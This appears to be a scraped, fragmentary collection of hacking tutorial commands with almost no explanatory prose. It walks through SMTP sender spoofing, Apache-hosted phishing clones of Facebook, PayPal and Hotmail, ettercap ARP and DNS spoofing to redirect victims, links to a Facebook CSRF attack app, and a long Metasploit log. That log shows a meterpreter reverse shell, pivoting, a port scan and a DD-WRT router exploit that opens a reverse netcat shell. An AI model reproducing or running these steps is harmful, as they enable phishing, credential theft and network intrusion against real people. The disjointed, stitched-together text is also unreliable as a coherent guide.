# ITS ©
# 2008 - 2009
220 stankdawg.com ESMTP Sendmail 8.12.5/8.12.5; Thu, 14 Nov 2002 18:39:56 -0500
HELO stankdawg.com 250 stankdawg.com Hello yourhostname.net [your IP here], pleased to meet you
MAIL FROM: bios@microsoft.com 250 2.1.0 bios@microsoft.com... Sender ok
RCPT TO: billgates@microsoft.com 250 Recipient ok
DATA Dear Bill, You suck. And your software sucks. And that’s sad. 250 Message accepted for delivery...
sudo ifconfig wlan0:1 up 192.168.1.123 sudo ifconfig wlan0:2 up 192.168.1.124 sudo ifconfig wlan0:3 up 192.168.1.125
SIOCSIFFLAGS: Cannot assign requested address
sudo ifconfig -a
sudo nautilus /var/www/
sudo nautilus /etc/apache2/sites-enabled/
ServerName 192.168.1.123 DocumentRoot /var/www/facebook/ ServerName 192.168.1.124 DocumentRoot /var/www/paypal/ ServerName 192.168.1.125 DocumentRoot /var/www/phish/hotmail/
sudo /etc/init.d/apache2 start
sudo mv /usr/share/ettercap/etter.dns /usr/share/ettercap/etter.dns.backup
sudo echo "www.facebook.com A 192.168.1.123" >> /usr/share/ettercap/etter.dns sudo echo "www.paypal.com A 192.168.1.124" >> /usr/share/ettercap/etter.dns sudo echo "www.hotmail.com A 192.168.1.125" >> /usr/share/ettercap/etter.dns
sudo ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof
http://apps.facebook.com/hacker-app/step1.php
http://apps.facebook.com/hacker-app/step2.php
http://apps.facebook.com/hacker-app/step1.php.
http://apps.facebook.com/hacker-app/step1.php
http://quaji.com/attack.gif.
http://apps.facebook.com/hacker-app/step1.php.
http://apps.facebook.com/hacker-app/step1.php.
http://apps.facebook.com/hacker-app/step2.php.
http://apps.facebook.com/hacker-app/step2.php
http://securitytube.net/CSRF-Attack-Demo-against-Facebook-video.aspx
msf > ifconfig eth0[*] exec: ifconfig eth0eth0 Link encap:Ethernet HWaddr 00:0e:7f:f9:12:62 inet addr:192.168.1.158 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:55461 errors:0 dropped:0 overruns:0 frame:0 TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:58889891 (58.8 MB) TX bytes:3107063 (3.1 MB) Interrupt:20 msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.158 LHOST => 192.168.1.158 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j -z[*] Exploit running as background job. msf exploit(handler) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085) msf exploit(handler) > session -i 1 [-] Unknown command: session. msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: AWINXP01 OS : Windows XP (Build 2600, Service Pack 2). meterpreter > execute -H -f -c -i -f cmd.exe Process 1708 created.Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>ipconfig ipconfig Windows IP ConfigurationEthernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.111.200 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.111.2 C:\Documents and Settings\administrator\Desktop>exit meterpreter >
meterpreter > Background session 1? [y/N]
msf exploit(handler) >
msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1
msf exploit(handler) > route print
Active Routing Table====================
Subnet Netmask Gateway
------ ------- -------
192.168.111.0 255.255.255.0 Session 1
msf exploit(handler) >
msf exploit(handler) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > info Name: TCP Port Scanner Version: 6823 License: Metasploit Framework License (BSD) Provided by: hdmkris katterjohn Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- -------------- PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds Description: Enumerate open TCP services msf auxiliary(tcp) > set PORTS 22,23,80,443 PORTS => 22,23,80,443msf auxiliary(tcp) > set RHOSTS 192.168.111.2 RHOSTS => 192.168.111.2 msf auxiliary(tcp) > run[*] TCP OPEN 192.168.111.2:22[*] TCP OPEN 192.168.111.2:23[*] TCP OPEN 192.168.111.2:80[*] Auxiliary module execution completed msf exploit(handler) >
msf exploit(handler) > connect -c 1 192.168.111.2 23 [*] Connected to 192.168.111.2:23 DD-WRT v24 std (c) 2007 NewMedia-NET GmbHRelease: 01/26/07 (SVN revision: 5660M) � DD-WRTx86CI login: ^Cmsf exploit(handler) > msf exploit(handler) >
msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat PAYLOAD => cmd/unix/reverse_netcat msf exploit(ddwrt_cgibin_exec) > set LPORT 2222 LPORT => 2222 msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2 RHOST => 192.168.111.2 msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158 LHOST => 192.168.1.158 msf exploit(ddwrt_cgibin_exec) > exploit [*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler.[*] Sending GET request with encoded command line.....[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531).. uname -aLinux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown